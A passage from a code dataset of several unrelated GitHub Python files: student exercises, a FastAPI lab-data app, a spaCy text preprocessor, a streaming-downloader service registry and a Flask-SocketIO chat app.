z2=2*l.b*(l.a*p.x+l.b*p.y+l.c)/(l.a**2+l.b**2)\n    p.x=p.x-z1\n    p.y=p.y-z2\n\ndef checkSides(p1,p2,l1,l2):\n    \"\"\"\n    Taking strictly greater case only,\n    as particulars weren't mentioned in question.\n    \"\"\"\n    z1=2*l1.a*(l1.a*p1.x+l1.b*p1.y+l1.c)/(l1.a**2+l1.b**2)\n    z2=2*l1.b*(l1.a*p1.x+l1.b*p1.y+l1.c)/(l1.a**2+l1.b**2)\n    r1=p1.x-z1\n    r2=p1.y-z2\n    r=Point(r1,r2)\n    return((l2.a*r.x+l2.b*r.y+l2.c)*(l2.a*p2.x+l2.b*p2.y+l2.c)>0)\n    \ndef checkIntersection(c1,c2): \n    d=math.sqrt((c1.centre_y-c2.centre_y)**2+(c1.centre_x-c2.centre_x)**2)\n    return (((c1.radius+c2.radius)>d) and (d>c1.radius) and (d>c2.radius))\n\n\n    \n    \n    \n    \n","repo_name":"arora-ansh/CSE101_IIITD","sub_path":"Labs/Lab6/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14825923580","text":"my_dict={\n    \"name\":\"ashish\",\n    \"role\":\"cybersecurity\",\n    \"city\":\"delhi\"\n}\n\nprint(my_dict.get(\"role\")) \n\nprint(my_dict.keys())\nmy_dict.update({\"shdjk\":\"skjd\"})\nprint(my_dict)\n\nfor keys in my_dict.keys():\n    print(keys)\n\nfor values in my_dict.values():\n    print(values)\n\nfor keys,values in my_dict.items():\n    print(keys,values)","repo_name":"ashishnagar47/Python","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14972079351","text":"import os\nfrom database import *\nimport pandas as pd\nfrom typing import List , Any\nfrom fastapi import FastAPI , Query , Form\nfrom fastapi import File, UploadFile\nfrom fastapi.responses import FileResponse , HTMLResponse\nfrom pydantic import BaseModel\nfrom math import pow\nfrom typing import List\n\nfrom analyze import *\nfrom crud import *\n\napp = FastAPI(\n    title= \"School Project\"\n    )\n\n\ndef find_value(index : int , tag_len: int , data : str , close_tag : str = \"$\"):\n\n    i = index + tag_len\n    value = \"\"\n    while not data[i] == close_tag:\n        value += data[i]\n        i+=1\n        if i >= len(data):\n            break\n\n    return value\n\ndef kappa(ref_dens : float , defu : float , cp : float):\n    return ref_dens * defu * cp\n\ndef kappa_calc(data):\n\n    data_dict = {\n        'REF_DENSITY' : None,\n        'SAMPLE_NAME' : None,\n        'Shot_number' : [],\n        'Temperature_lfa' : [],\n        'Diffusivity' : [],\n        'Std_dev' : [],\n        'Cp_calc' : [],\n        'Kappa' : []\n    }\n    \n    try:\n        data_dict[\"REF_DENSITY\"] = float(find_value(data.index(\"#Ref_density /(g/cm^3),\") , len(\"#Ref_density /(g/cm^3),\"), data , close_tag = \"\\\\\"))\n        data_dict[\"SAMPLE_NAME\"] = find_value(data.index(\"#Sample,\") , len(\"#Sample,\"), data , close_tag = \"\\\\\")\n        data = find_value(data.index(\"#Cp-calc./(J/g/K)\\\\r\\\\n\") , len(\"#Cp-calc./(J/g/K)\\\\r\\\\n\") , data)\n    except:\n        pass\n    \n    for row in data.split(\"\\\\r\\\\n\"):\n        \n        try:\n            row = row.split(\",\")\n            data_dict[\"Shot_number\"].append(row[0])\n            data_dict[\"Temperature_lfa\"].append(float(row[1]) + 273.0) \n            data_dict[\"Diffusivity\"].append(float(row[2])) \n            data_dict[\"Std_dev\"].append(float(row[3])) \n            data_dict[\"Cp_calc\"].append(float(row[4])) \n            data_dict[\"Kappa\"].append(kappa(\n                ref_dens = data_dict[\"REF_DENSITY\"],\n                defu = float(row[2]),\n                cp = float(row[4])\n            )) \n        except:\n            pass\n    \n    return data_dict\n\n\n@app.get(\"/download-data\" , tags=[\"Data files\"])\nasync def download_file():\n    cell_data_file_path = \"cell-data.csv\"\n    df = pd.DataFrame(get_all_cell_data())\n    
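# snapshot the current cell data to disk so it can be streamed back as a file\n    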
df.to_csv(cell_data_file_path , index=False)\n\n \n return FileResponse(cell_data_file_path , media_type='application/octet-stream',filename=cell_data_file_path)\n \n@app.post(\"/itamar/raw-data-file\")\nasync def zt_file_analyzer(\n lfa_file: UploadFile = File(...),\n lsr_file: UploadFile = File(...),\n):\n\n data_dict = kappa_calc(str(lfa_file.file.read()))\n\n\n with open(lsr_file.filename, \"wb\") as binary_file:\n \n # Write bytes to file\n binary_file.write(lsr_file.file._file.read())\n \n df = pd.read_excel(lsr_file.filename)\n\n data_dict[\"Temperature_lsr\"] = [val + 273.0 for val in df[\"Temperature(°C)\"]]\n data_dict[\"Seebeck_cof\"] = [val for val in df[\"Seebeck coefficient(µV/K)\"]]\n data_dict[\"Resistivity\"] = [val * 10**5 for val in df[\"Resistivity(??m)\"]]\n \n\n\n kappa_func = scipy.interpolate.PchipInterpolator(data_dict[\"Temperature_lfa\"], data_dict[\"Kappa\"] , extrapolate=True)\n \n data_dict[\"ZT\"] = []\n data_dict[\"Power_Factor\"] = []\n data_dict[\"Kappa_Interp\"] = []\n for s , t , r in zip(data_dict[\"Seebeck_cof\"] , data_dict[\"Temperature_lsr\"] , data_dict[\"Resistivity\"]):\n data_dict[\"Kappa_Interp\"].append(kappa_func.__call__(t))\n data_dict[\"ZT\"].append(((s**2)*t)/(kappa_func.__call__(t)*r*pow(10,7)))\n data_dict[\"Power_Factor\"].append(pow(s , 2) / (r*pow(10,7)))\n\n del data_dict[\"REF_DENSITY\"]\n del data_dict[\"SAMPLE_NAME\"]\n\n\n max_len = 0\n for key in data_dict.keys():\n try:\n if len(data_dict[key]) > max_len:\n max_len = len(data_dict[key])\n except:\n pass\n\n\n\n for key in data_dict.keys():\n for i in range(max_len):\n try:\n if data_dict[key][i] == None:\n pass\n except:\n data_dict[key].append(\"\")\n \n if os.path.exists(lfa_file.filename):\n os.remove(lfa_file.filename)\n if os.path.exists(lsr_file.filename):\n os.remove(lsr_file.filename)\n\n df = pd.DataFrame.from_dict(data_dict)\n df.to_csv(\"data.csv\")\n\n return FileResponse(\"data.csv\" , media_type='application/octet-stream',filename=lfa_file.filename)\n\n@app.post(\"/upload-folder\" , tags=[\"Data files\"])\nasync def upload_batch_folder(file: UploadFile = File(...),):\n \n res = {\"Result\": \"OK\", \"filenames\": file.filename}\n if file.filename.lower().endswith(\"png\") or file.filename.lower().endswith(\"jpg\") or file.filename.lower().endswith(\"jpg\"):\n # update image info\n file_info = file.filename.split(\"/\")\n batch_name = file_info[0]\n batch_number = int(batch_name.split(\"_\")[1])\n encapsulation_status = file_info[1]\n filename = file_info[-1]\n update_cell_image_path(batch_number , filename.split(\".\")[0] , file.filename)\n\n if not file.filename.endswith(\"txt\"):\n return res\n if \"table\" in file.filename or \"results\" in file.filename:\n return res\n if \"all\" in file.filename:\n return res\n \n file_info = file.filename.split(\"/\")\n batch_name = file_info[0]\n batch_number = int(batch_name.split(\"_\")[1])\n encapsulation_status = file_info[1]\n filename = file_info[-1]\n\n if not (\"l\" in filename.lower() or \"d\" in filename.lower()):\n print(filename)\n filename = f'{filename.split(\".\")[0]}-L.{filename.split(\".\")[1]}'\n print(filename)\n\n\n cellarea = 0.09\n\n data = file.file.read().decode(\"utf-8\")\n\n try:\n data = get_IV_from_content(data=data)\n data = analyze_IV(I=data[\"I\"] , V=data[\"V\"] , cellarea=cellarea)\n except:\n return res\n\n\n update_cell_IV_measurement(\n fabrication_procedure_number = 0 , \n filename = filename , \n batch_number = batch_number,\n encapsulation_status = encapsulation_status,\n 
encapsulation_material = None ,\n        cellarea = 0.09,\n\n        Jsc = data[\"Jsc\"],\n        Voc = data[\"Voc\"],\n        FF = data[\"FF\"],\n        Eff = data[\"Eff\"],\n        Pmax = data[\"Pmax\"],\n        Vmp = data[\"Vmp\"],\n        Imp = data[\"Imp\"],\n    )\n\n    return res\n\n\n\n\n@app.put(\"/update-batch/config/{batch_number}\" , tags=[\"Batch\"])\nasync def update_batch_configurations(\n    batch_number : int,\n    fabrication_procedure : int = Query(1 , enum = [i+1 for i in range(9)]),\n    encapsulation_procedure : int = Query(1 , enum = [i+1 for i in range(8)]),\n    update_times : bool = False,\n    fabrication_time : datetime = datetime.now(),\n    encapsulation_time : datetime = datetime.now(),\n):\n    \n    return update_batch_params(\n        batch_number = batch_number,\n        fabrication_procedure = fabrication_procedure,\n        encapsulation_procedure = encapsulation_procedure,\n        update_times = update_times,\n        fabrication_time = fabrication_time,\n        encapsulation_time = encapsulation_time,\n    )\n\n@app.delete(\"/batch/delete/{batch_number}\" , tags=[\"Batch\"])\nasync def delete_one_batch(\n    batch_number : int,\n):\n\n    return delete_batch(batch_number=batch_number)\n\n@app.get(\"/procedure/get-all\" , tags=[\"Procedures\"],)\nasync def get_all_procedures(\n    procedure_type : str = Query(\"encapsulation\" , enum = (\"encapsulation\" , \"fabrication\"))\n):\n\n    return get_procedures(\n        procedure_type = procedure_type\n    )\n\n@app.post(\"/fabrication-procedure/{id}\" , tags=[\"Procedures\"],)\nasync def create_fabrication_procedure(\n    id : int,\n    name : str,\n    description : str,\n):\n\n    return update_fabrication_procedure(\n        id = id,\n        name = name,\n        description = description\n    )\n\n@app.post(\"/encapsulation-procedure/{id}\" , tags=[\"Procedures\"],)\nasync def create_encapsulation_procedure(\n    id : int,\n    pressure : float,\n    kapton_in_gb : bool,\n    encapsulation_in_gb : bool,\n    encapsulation_material : str = Query(analyze.encapsulation_types[0] , enum = analyze.encapsulation_types),\n    name : str = None,\n):\n\n    return update_encapsulation_procedure(\n        id = id,\n        name = name,\n        pressure = pressure,\n        kapton_in_gb = kapton_in_gb,\n        encapsulation_in_gb = encapsulation_in_gb,\n        encapsulation_material = encapsulation_material,\n    )\n\n@app.get(\"/celldata/get-all\" , tags=[\"Cell data\"])\nasync def get_all_cells():\n    return get_all_cell_data()\n\n# display home page\n@app.get(\"/\" , tags=[\"stats\"])\ndef display_dashboard(\n\n):\n    \n    data = get_all_cell_data()\n    \n    batch_numbers_list , pixel_for_batch = get_pixels_in_batch(data)\n    encapsulation_types_yield_data = get_encapsulations_yeild_numbers()\n    \n\n    content_replace = {\n\n        \"encapsulation_types_list\" : str([\"\"] + encapsulation_types + [\"\"]),\n        \"encapsulation_types_yield_data\" : str([0] + encapsulation_types_yield_data + [0]),\n\n        \"batch_list\" : str(batch_numbers_list),\n        \"num_of_pixels_in_batch\" : str(pixel_for_batch),\n\n        # \"celldata_table\" : dict_to_html_table(data),\n        # \"procedures_table\" : str(get_procedures(format=\"html-table\"))\n    }\n\n\n    with open(\"static/index.html\" , 'r') as f: \n        html_content = f.read()\n    for key in content_replace.keys():\n        html_content = html_content.replace(\n            key , content_replace[key]\n        )\n\n    return HTMLResponse(content=html_content, status_code=200)\n","repo_name":"ofryma/school_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12209624199","text":"import re\nimport numpy as np\nimport pandas as pd\nimport 
spacy\nimport Utils\nfrom sklearn.model_selection import train_test_split\n\n\nclass Preprocessor:\n    \n    def __init__(self, name, df, cache=True, test_size=0.3, random_state=42):\n        '''\n        Class used for text preprocessing\n        If you don't have spaCy installed: https://spacy.io/usage\n        '''\n        self.name = name\n        self.df = df\n        self.cache = cache\n        self.test_size = test_size\n        self.random_state = random_state\n        self.messy_texts = df['text']\n        self.nlp = spacy.load('en_core_web_sm')\n        self.stopwords = self.nlp.Defaults.stop_words\n        self.regex = {\n            \n            # custom regex to add a space between sticking words (e.g. 'endStart')\n            #'camel_case_space': re.compile('([a-z])([A-Z])'),\n            \n            # replace html with htmlregex\n            'html': re.compile(r'<[^>]+>'),\n            \n            # replace url with urlregex\n            'url': re.compile(r'((http:\\/\\/)[^ ]*|(https:\\/\\/)[^ ]*|(www\\.)[^ ]*)'),\n\n            # replace @user with userregex\n            \"user\": re.compile(r'@[^\\s]+'),\n            \n            # replace #topic with topic (at least 3 chars)\n            \"hashtag\": re.compile(r'#([^\\s]{3,})'),\n            \n            # replace 'heyyyy' with 'heyy'\n            \"char_repetition\": re.compile(r'(.)\\1\\1+'),\n            \n            \"heart\": re.compile(r'<3'),\n\n            \"happy_smile\": re.compile(r\"[8:=;]['`\\-]?[)d]+\"),\n            \n            \"sad_smile\": re.compile(r\"[8:=;]['`\\-]?\\(+\"),\n            \n            \"neutral_smile\": re.compile(r\"[8:=;]['`\\-]?[\\/|]\"),\n            \n            \"laugh_smile\": re.compile(r\"[8:=;]['`\\-]?[pD]+\"),\n            \n            # remove non-alphabetic characters\n            'non_alpha': re.compile('[^a-zA-Z]'),\n\n            # custom regex to remove single characters (also at beginning)\n            'single_char': re.compile(r'(\\s|^).(?=\\s+)'),\n\n            # regex to remove multiple spaces\n            'multi_space': re.compile(r'\\s\\s+')\n        }\n\n    \n    def run(self):\n        '''\n        If available, read preprocessed.parquet.gzip from cache\n        Otherwise create preprocessed.parquet.gzip and write it to cache\n        '''\n        if self.cache:\n            return Utils.parquet_caching(\n                parquet_name = self.name + \"_preprocessed\",\n                callback = self.run_nlp_pipeline\n            )\n        else:\n            return self.run_nlp_pipeline() \n    \n\n    def lemmatize_and_remove_stopwords(self, text):\n        '''\n        We use spaCy to lemmatize our texts and remove stopwords.\n        We skip pronouns, which spaCy lemmatizes to '-PRON-'.\n        '''\n        doc = self.nlp(text)\n        return ' '.join(token.lemma_ for token in doc if token.lemma_ != '-PRON-' and token.lemma_ not in self.stopwords)\n    \n    \n    def get_factorized_sentiments(self):\n        codes, uniques = self.df['sentiment'].factorize()\n        return codes\n\n    def run_nlp_pipeline(self):\n        '''\n        To generate a corpus of lemmatized documents we feed our text data\n        through an NLP pipeline that performs lemmatization, removes stopwords\n        and applies our regular expressions. 
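The tag-like substitutions (html, url,\n        user, smileys, etc.) run first, lemmatization second, and the alphabetic\n        and whitespace cleanups last. 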
\n        '''\n        processed_texts = []\n\n        for messy_text in self.messy_texts:\n\n            # text = self.regex['camel_case_space'].sub(r'\\1 \\2', messy_text)\n            text = self.regex['html'].sub(' htmlregex ', messy_text)\n            text = self.regex['url'].sub(' urlregex ', text)\n            text = self.regex['user'].sub(' userregex ', text)\n            text = self.regex['hashtag'].sub(r'\\1', text)\n            text = self.regex['char_repetition'].sub(r'\\1\\1', text)\n            text = self.regex['heart'].sub('heartregex', text)\n            text = self.regex['happy_smile'].sub('happyregex', text)\n            text = self.regex['sad_smile'].sub('sadregex', text)\n            text = self.regex['neutral_smile'].sub('neutralregex', text)\n            text = self.regex['laugh_smile'].sub('laughregex', text)\n            text = self.lemmatize_and_remove_stopwords(text.lower())\n            text = self.regex['non_alpha'].sub(' ', text)\n            text = self.regex['single_char'].sub(' ', text)\n            text = self.regex['multi_space'].sub(' ', text)\n            text = text.strip()\n\n            processed_texts.append(text)\n        \n        processed_df = self.df.copy()\n        processed_df['text'] = processed_texts\n        processed_df['sentiment'] = self.get_factorized_sentiments()\n\n        return processed_df\n    \n    \n    def split(self, Xy): \n        X_train, X_test, y_train, y_test = train_test_split(\n            Xy['text'], Xy['sentiment'], test_size = self.test_size, random_state = self.random_state\n        )\n        train_test_sets = {\n            \"X_train\": X_train,\n            \"X_test\": X_test,\n            \"y_train\": y_train,\n            \"y_test\": y_test,\n        }\n        return train_test_sets","repo_name":"saschageyer/sa-benchmark","sub_path":"Preprocessor.py","file_name":"Preprocessor.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13142540342","text":"# Python Exercise 098: Write a program that has a function called contador(), which takes three parameters: start,\n# end and step. Your program has to perform three counts using the function you created:\n# a) from 1 to 10, 1 by 1 . b) from 10 to 0, 2 by 2 , c) a custom count\n\ndef contador(initial, final, pace):\n    print(f'~' * 30)\n    print(f'Counting from {initial} to {final} in steps of {pace}.')\n    if initial < final and pace < 0:\n        print(f'This step is not possible; it needs to be positive.')\n        return\n    elif initial > final and pace > 0:\n        print(f'This step is not possible; it needs to be negative.')\n        return\n    elif initial == final:\n        print(f'This count is not possible if the start {initial} and the end {final} are equal.')\n        return\n    elif pace == 0:\n        print(f'0 cannot be used as the step.')\n        return\n    if pace > 0:\n        final += 1\n    else:\n        final -= 1\n\n    for cont in range(initial, final, pace):\n        print(cont, end=' ')\n    print(f'END')\n\ncontador(1, 10, 1)\ncontador(10, 1, -2)\nprint(f'~' * 30)\nwhile True:\n    i = int(input('Enter the start of the count: '))\n    f = int(input('Enter the end of the count: '))\n    p = int(input('Enter the step: '))\n    contador(i, f, p)\n    sair = str(input('Do you want to quit? [ S/N ] ')).upper().strip()\n    while sair not in 'SN':\n        sair = str(input('To quit enter [ S/N ] ')).upper().strip()\n    if sair == 'S':\n        break\n","repo_name":"tuteixeira/python_exercises","sub_path":"exercise098.py","file_name":"exercise098.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"75120205044","text":"import sys\nimport re\nimport importlib.util\n\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nfrom utils.utilities import info, error\n\n\ndef _services():\n    \"\"\"Dictionary of supported services\"\"\"\n\n    services = Path(\"services\")\n\n    supported_services = {\n        \"iview.abc.net.au\": {\n            \"name\": \"ABC\",\n            \"alias\": \"ABC iView\",\n            \"path\": services / \"abciview\" / \"abciview.py\",\n            \"api\": services / \"abciview\" / \"api.yaml\",\n            \"config\": services / \"abciview\" / \"config.yaml\",\n        },\n        \"www.bbc.co.uk\": {\n            \"name\": \"BBC\",\n            \"alias\": \"BBC iPlayer\",\n            \"path\": services / \"bbciplayer\" / \"bbciplayer.py\",\n            \"api\": services / \"bbciplayer\" / \"api.yaml\",\n            \"config\": services / \"bbciplayer\" / \"config.yaml\",\n        },\n        \"www.channel4.com\": {\n            \"name\": \"CHANNEL4\",\n            \"alias\": \"ALL4\",\n            \"path\": services / \"channel4\" / \"channel4.py\",\n            \"api\": services / \"channel4\" / \"api.yaml\",\n            \"config\": services / \"channel4\" / \"config.yaml\",\n        },\n        \"www.channel5.com\": {\n            \"name\": \"CHANNEL5\",\n            \"alias\": \"My5 TV\",\n            \"path\": services / \"channel5\" / \"channel5.py\",\n            \"api\": services / \"channel5\" / \"api.yaml\",\n            \"config\": services / \"channel5\" / \"config.yaml\",\n        },\n        \"www.crackle.com\": {\n            \"name\": \"CRACKLE\",\n            \"alias\": \"CRACKLE\",\n            \"path\": services / \"crackle\" / \"crackle.py\",\n            \"api\": services / \"crackle\" / \"api.yaml\",\n            \"config\": services / \"crackle\" / \"config.yaml\",\n        },\n        \"www.ctv.ca\": {\n            \"name\": \"CTV\",\n            \"alias\": \"CTV\",\n            \"path\": services / \"ctv\" / \"ctv.py\",\n            \"api\": services / \"ctv\" / \"api.yaml\",\n            \"config\": services / \"ctv\" / \"config.yaml\",\n        },\n        \"gem.cbc.ca\": {\n            \"name\": \"CBC\",\n            \"alias\": \"CBC Gem\",\n            \"path\": services / \"cbc\" / \"cbc.py\",\n            \"api\": services / \"cbc\" / \"api.yaml\",\n            \"config\": services / \"cbc\" / \"config.yaml\",\n        },\n        \"www.itv.com\": {\n            \"name\": \"ITV\",\n            \"alias\": \"ITVX\",\n            \"path\": services / \"itv\" / \"itv.py\",\n            \"api\": services / \"itv\" / \"api.yaml\",\n            \"config\": services / \"itv\" / \"config.yaml\",\n        },\n        \"pluto.tv\": {\n            \"name\": \"PLUTO\",\n            \"alias\": \"PlutoTV\",\n            \"path\": services / \"pluto\" / \"pluto.py\",\n            \"api\": services / \"pluto\" / \"api.yaml\",\n            \"config\": services / \"pluto\" / \"config.yaml\",\n        },\n        \"therokuchannel.roku.com\": {\n            \"name\": \"ROKU\",\n            \"alias\": \"The Roku Channel\",\n            \"path\": services / \"roku\" / \"roku.py\",\n            \"api\": services / \"roku\" / \"api.yaml\",\n            \"config\": services / \"roku\" / \"config.yaml\",\n        },\n        \"player.stv.tv\": {\n            \"name\": \"STV\",\n            \"alias\": \"STV Player\",\n            \"path\": services / \"stv\" / \"stv.py\",\n            \"api\": services / \"stv\" / \"api.yaml\",\n            \"config\": services / \"stv\" / \"config.yaml\",\n        },\n        \"tubitv.com\": {\n            \"name\": \"TUBITV\",\n            \"alias\": \"TubiTV\",\n            \"path\": services / \"tubi\" / \"tubitv.py\",\n            \"api\": services / \"tubi\" / \"api.yaml\",\n            \"config\": services / \"tubi\" / \"config.yaml\",\n        },\n        \"uktvplay.co.uk\": {\n            \"name\": \"UKTVPLAY\",\n            \"alias\": \"UKTV 
Play\",\n \"path\": services / \"uktvplay\" / \"uktvplay.py\",\n \"api\": services / \"uktvplay\" / \"api.yaml\",\n \"config\": services / \"uktvplay\" / \"config.yaml\",\n },\n \"www.cwtv.com\": {\n \"name\": \"CW\",\n \"alias\": \"The CW\",\n \"path\": services / \"cwtv\" / \"cwtv.py\",\n \"api\": services / \"cwtv\" / \"api.yaml\",\n \"config\": services / \"cwtv\" / \"config.yaml\",\n },\n }\n\n return supported_services\n\n\ndef get_service(url: str):\n \"\"\"Parse URL and dynamically import any supported service\"\"\"\n\n supported = _services()\n\n find_service = next(\n (\n info\n for service, info in supported.items()\n if service == urlparse(url).netloc\n ),\n None,\n )\n\n if find_service is None:\n error(\"Service is not supported\")\n sys.exit(1)\n\n spec = importlib.util.spec_from_file_location(\n find_service[\"name\"], str(find_service[\"path\"])\n )\n service_module = importlib.util.module_from_spec(spec)\n sys.modules[find_service[\"name\"]] = service_module\n spec.loader.exec_module(service_module)\n srvc = getattr(service_module, find_service[\"name\"])\n api = find_service.get(\"api\")\n config = find_service.get(\"config\")\n info(find_service[\"alias\"])\n return srvc, api, config\n","repo_name":"stabbedbybrick/freevine","sub_path":"utils/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"76"} +{"seq_id":"71521437685","text":"import os\nimport requests\nimport datetime\n\nfrom flask import Flask, session, render_template, request, redirect, url_for, jsonify\nfrom flask_session import Session\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\n\n# Config flask app\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Global variables. A future improvement would be to store this data in a database instead of on server memory.\n# That way we would also make sure that the channel list and messages don't disappear between server resets.\nchannelList = []\nprivateChannelList = []\nbufferDict = {}\n\n\n# Index page\n@app.route(\"/\")\ndef index():\n\n # Check if the user session has a channel name stored, and redirect there if so.\n if session.get(\"channel\"):\n channelName = session.get(\"channel\")\n return redirect(f\"/channels/{channelName}\")\n\n # Determine what the unread messages badge shall display. badge() returns the number of unread conversations.\n if session.get('username') != None:\n badgeInfo = badge(session.get('username'))\n else:\n badgeInfo = 0\n\n # Render index template otherwise.\n return render_template(\"index.html\", channels = channelList, badge = badgeInfo)\n\n\n# Home page. When forced to go to index instead of redirecting to session channel.\n@app.route(\"/home\")\ndef home():\n # Determine what the unread messages badge shall display. 
badge() returns the number of unread conversations.\n    if session.get('username') != None:\n        badgeInfo = badge(session.get('username'))\n    else:\n        badgeInfo = 0\n\n    # Render index template otherwise.\n    return render_template(\"index.html\", channels = channelList, badge = badgeInfo)\n\n\n# Home page. When forced to go to index instead of redirecting to session channel.\n@app.route(\"/home\")\ndef home():\n    # Determine what the unread messages badge shall display. badge() returns the number of unread conversations.\n    if session.get('username') != None:\n        badgeInfo = badge(session.get('username'))\n    else:\n        badgeInfo = 0\n\n    # Return session channel to none and load index page.\n    session[\"channel\"] = None\n    return render_template(\"index.html\", channels = channelList, badge = badgeInfo)\n\n\n# Save username in session\n@app.route(\"/saveUsername\", methods=[\"POST\"])\ndef saveUser():\n    username = request.form.get(\"username\")\n    session[\"username\"] = username\n    return jsonify({\"success\": True})\n\n\n# This route adds a channel to the channel list\n@app.route(\"/addChannel\", methods=[\"POST\"])\ndef addChannel():\n\n    # Query for channel name\n    channelName = request.form.get(\"channelName\")\n\n    # Check if the channel doesn't exist yet and create it\n    if channelName not in channelList:\n\n        # Update channel list\n        channelList.append(channelName)\n\n        # Create buffer dictionary with maximum storage of last 100 messages\n        bufferDict[channelName] = RingBuffer(100)\n\n        print(\"channel added:\", channelName)\n        return jsonify({\"success\": True})\n\n    else:\n        return jsonify({\"success\": False})\n\n\n# This route returns the channel page if the channel exists, and home/index otherwise.\n@app.route(\"/channels/<channelName>\")\ndef channel(channelName):\n    # Determine what the unread messages badge shall display. badge() returns the number of unread conversations.\n    if session.get('username') != None:\n        badgeInfo = badge(session.get('username'))\n    else:\n        badgeInfo = 0\n\n    # Check if channel exists and render channel template if it does.\n    if channelName in channelList:\n        messages = bufferDict[channelName].get()\n        session[\"channel\"] = channelName\n        username = session.get(\"username\")\n        return render_template(\"channel.html\", channelName = channelName, messages = messages, username = username, badge = badgeInfo)\n\n    # Return home/index otherwise.\n    else:\n        print(\"CHANNEL: \" + channelName + \" NOT IN CHANNEL LIST!\")\n        return redirect(\"/home\")\n\n\n# This route returns the private messages page.\n@app.route(\"/privateMessages/<username>\")\ndef privateMessages(username):\n    # Determine what the unread messages badge shall display. 
badge() returns the number of unread conversations.\n    if session.get('username') != None:\n        badgeInfo = badge(session.get('username'))\n    else:\n        badgeInfo = 0\n    \n    # Query for username private conversations\n    targetNames = []\n    for i in privateChannelList:\n        if username == i[1]:\n            targetNames.append(i[2])\n        elif username == i[2]:\n            targetNames.append(i[1])\n\n    # Return private messages page\n    return render_template(\"privMessages.html\", targetNames = targetNames, username = username, badge = badgeInfo)\n\n\n# This route returns the private message page.\n@app.route(\"/privateMessage/<targetName>/<username>\")\ndef privateMessage(targetName, username):\n\n    # Create compound names\n    name1 = targetName + '&' + username\n    name2 = username + '&' + targetName\n\n    # Check if private channel exists and render channel template if it does.\n    for i in privateChannelList:\n        if name1 in i:\n            messages = bufferDict[name1].get()\n            i[4] = False\n            return render_template(\"channel.html\", channelName = name1, messages = messages, username = username)\n        elif name2 in i:\n            messages = bufferDict[name2].get()\n            i[3] = False\n            return render_template(\"channel.html\", channelName = name2, messages = messages, username = username)\n\n    # Create private channel otherwise.\n    # Append private channel list ([channelName, user1, user2, user1_unread, user2_unread])\n    privateChannelList.append([name1, targetName, username, False, False])\n\n    # Create buffer dictionary with maximum storage of last 100 messages\n    bufferDict[name1] = RingBuffer(100)\n\n    print(\"private channel added:\", name1)\n    \n    return render_template(\"channel.html\", channelName = name1, messages = [], username = username)\n\n\n# This method determines if the user has private unread messages\ndef badge(username):\n    unreadConvs = 0\n    for i in privateChannelList:\n        if username == i[1] and i[3] == True:\n            unreadConvs += 1\n        elif username == i[2] and i[4] == True:\n            unreadConvs += 1\n    return unreadConvs\n\n\n# When a join is submitted, this method joins the user to the channel\n@socketio.on('join')\ndef on_join(data):\n    # Query username and channelName\n    username = data['username']\n    channelName = data['channelName']\n\n    # Join that socket (SID) to the channel\n    join_room(channelName)\n    print(username + ' has joined ' + channelName)\n\n    # # Check if it is a private channel and print joined SID if it is.\n    # for i in privateChannelList:\n    #     if channelName in i and i[1] == username:\n    #         i[5] = request.sid\n    #         print(i[5] + ' joined ' + channelName)\n    #     elif channelName in i and i[2] == username:\n    #         i[6] = request.sid\n    #         print(i[6] + ' joined ' + channelName)\n\n\n# When a message is submitted, this method stores the message in server memory and broadcasts it to sockets.\n@socketio.on(\"submit message\")\ndef message(data):\n\n    # Query for message, username and channel name\n    content = data[\"content\"] # message\n    username = data[\"username\"]\n    channelName = data[\"channelName\"]\n\n    # Query for server time and edit it\n    datetime_object = datetime.datetime.now()\n    serverdatetime = datetime_object.strftime('%Y-%m-%d %H:%M:%S.%f')[:-10]\n\n    # Store message in channel ring buffer\n    bufferDict[channelName].append([username, serverdatetime, content, 'text'])\n\n    # Notify unread messages if it is a private channel\n    for i in privateChannelList:\n        if channelName in i:\n            if i[1] == username:\n                i[4] = True\n            elif i[2] == username:\n                i[3] = True \n\n    # Broadcast message to sockets.\n    emit(\"announce message\", {\"username\": username, 
\"datetime\":serverdatetime, \"content\": content}, room=channelName)\n\n\n# When a file is submitted, this method stores the file in server memory and broadcasts it to sockets.\n@socketio.on(\"submit file\")\ndef fileUpload(data):\n\n # Query for file, username and channel name. File data is received, stored and broadcasted as DataURL.\n fileData = data[\"file\"]\n username = data[\"username\"]\n channelName = data[\"channelName\"]\n\n # Query for server time and edit it\n datetime_object = datetime.datetime.now()\n serverdatetime = datetime_object.strftime('%Y-%m-%d %H:%M:%S.%f')[:-10]\n\n # Store message in channel ring buffer\n bufferDict[f'{channelName}'].append([username, serverdatetime, fileData, 'image'])\n\n # Notify unread messages if it is private channel\n for i in privateChannelList:\n if channelName in i:\n if i[1] == username:\n i[4] = True\n elif i[2] == username:\n i[3] = True \n\n # Broadcast message to sockets\n emit(\"announce file\", {\"username\": username, \"datetime\":serverdatetime, \"file\": fileData}, room=channelName)\n\n\n# When a message is received by client, this method unchecks the unread values.\n@socketio.on(\"message received\")\ndef messageReceived(data):\n\n # Query for username and channel name\n username = data[\"username\"]\n channelName = data[\"channelName\"]\n\n # Message is read if it is private channel\n for i in privateChannelList:\n if channelName in i:\n if i[2] == username:\n i[4] = False\n # print(username + ' read the message')\n # print(i)\n elif i[1] == username:\n i[3] = False\n # print(username + ' read the message')\n # print(i)\n\n\n# When a file is received by client, this method unchecks the unread values.\n@socketio.on(\"file 